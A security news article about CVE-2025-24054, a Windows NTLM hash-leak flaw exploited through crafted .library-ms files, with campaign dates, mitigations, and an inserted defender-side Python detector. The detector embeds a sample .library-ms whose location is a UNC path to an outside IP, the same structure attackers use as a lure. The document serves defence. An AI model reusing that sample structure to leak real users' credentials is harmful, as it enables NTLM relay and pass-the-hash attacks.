
CVE-2025-24054 Under Active Exploitation — Critical NTLM Credential Theft Vulnerability in Windows


A newly exploited Windows security flaw, identified as CVE-2025-24054, is now under active attack—allowing threat actors to steal NTLM credentials through simple file downloads. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog following verified reports of in-the-wild exploitation.


🔍 What is CVE-2025-24054?

  • CVE ID: CVE-2025-24054

  • CVSS Score: 6.5 (Medium Severity)

  • Impact: NTLM hash disclosure via spoofing

  • Affected Systems: Microsoft Windows

  • Patched: March 2025 Patch Tuesday update

  • Discovered by: Rintaro Koike (NTT Security Holdings), 0x6rss, and j00sean


🚨 Exploited via Malicious .library-ms Files

The vulnerability stems from a spoofing issue within the deprecated NTLM (New Technology LAN Manager) authentication protocol. Microsoft warns that minimal interaction with a specially crafted .library-ms file—such as clicking, right-clicking, or merely viewing the file—can trigger the flaw.


Attackers can exploit this to leak NTLMv2 hashes, which can then be weaponized in pass-the-hash or relay attacks to infiltrate systems and move laterally within networks.


“Microsoft Windows NTLM contains an external control of file name or path vulnerability that allows an unauthorized attacker to perform spoofing over a network,” said CISA.


⚠️ Widespread Attacks and Active Campaigns

According to Check Point Research, the vulnerability has been actively exploited since March 19, 2025, despite Microsoft's initial classification of "Exploitation Less Likely."

Notable Campaigns Include:

  • March 20–21, 2025:

    • Attackers launched a malspam campaign targeting government and private sectors in Poland and Romania.

    • The emails contained Dropbox links distributing ZIP files embedded with CVE-2025-24054, enabling NTLMv2 hash theft.


  • March 25, 2025:

    • A separate phishing wave delivered an uncompressed malicious file named Info.doc.library-ms.

    • Since then, at least 10 campaigns have been documented using this method.


Once the malicious archive is extracted, Windows Explorer automatically initiates an SMB authentication request, leaking the victim’s NTLM credentials without any direct user interaction.


🛡️ Urgent Security Recommendations

Check Point emphasizes that these ongoing attacks highlight the critical need for immediate patching and system hardening:


“The minimal user interaction required and the ease with which NTLM hashes are exposed make this a high-priority risk for lateral movement and privilege escalation.”


✅ Mitigation Steps

  • Install Microsoft’s March 2025 security updates immediately.

  • Disable NTLM authentication wherever possible and switch to Kerberos.

  • Educate end users about suspicious file downloads and phishing emails.

  • Monitor SMB traffic and external authentication requests.
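As an added defender-side example, not code from this article or from the researchers it cites, the following Python script inspects a .library-ms file (XML in the Windows Library Description schema) and flags any `<simpleLocation><url>` entry that is a UNC path to a host outside the intranet, which is the kind of location that makes Explorer start an outbound SMB authentication. The two sample documents, the intranet address ranges and the internal DNS suffix are constructed assumptions.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespace of the Windows Library Description schema used by .library-ms files.
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample (not a real indicator): a library whose only location is a UNC path on a
# public IP. Explorer resolving such a location is what triggers the outbound SMB authentication.
SUSPICIOUS_LIBRARY = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Shared Documents</name>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\203.0.113.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

# Constructed benign sample: the same library pointing at an intranet file server instead.
BENIGN_LIBRARY = SUSPICIOUS_LIBRARY.replace("\\\\203.0.113.10\\share", "\\\\fileserver01\\projects")

# Assumption: these ranges and this DNS suffix are the organisation's intranet; adjust as needed.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_DNS_SUFFIX = ".corp.example"
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")  # \\host\share or \\host

def extract_locations(xml_text: str) -> list[str]:
    """Return every <simpleLocation><url> value in a .library-ms document."""
    root = ET.fromstring(xml_text)
    return [u.text.strip() for u in root.iterfind(".//lib:simpleLocation/lib:url", NS) if u.text]

def is_external_host(host: str) -> bool:
    """True when Explorer would have to reach outside the intranet to contact this host."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # DNS names: single-label (NetBIOS-style) and internal-suffix names count as intranet.
        return "." in host and not host.lower().endswith(INTERNAL_DNS_SUFFIX)
    return not any(ip in net for net in INTERNAL_NETS)

def suspicious_locations(xml_text: str) -> list[str]:
    """UNC locations that would send an NTLM exchange to a host outside the network."""
    hits = []
    for loc in extract_locations(xml_text):
        m = UNC_RE.match(loc)
        if m and is_external_host(m.group(1)):
            hits.append(loc)
    return hits
```

Run it over .library-ms attachments quarantined by the mail gateway or found in user download folders; a non-empty result is worth an alert even before the file is opened.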


⏳ Deadline for Government Agencies

All Federal Civilian Executive Branch (FCEB) agencies must apply the fix no later than May 8, 2025, as mandated by CISA.


🏁 Final Thoughts

CVE-2025-24054 poses a significant security threat due to its low interaction requirement and the potential for credential compromise. Organizations must act swiftly to patch the flaw, review their authentication configurations, and stay vigilant against malicious .library-ms file campaigns.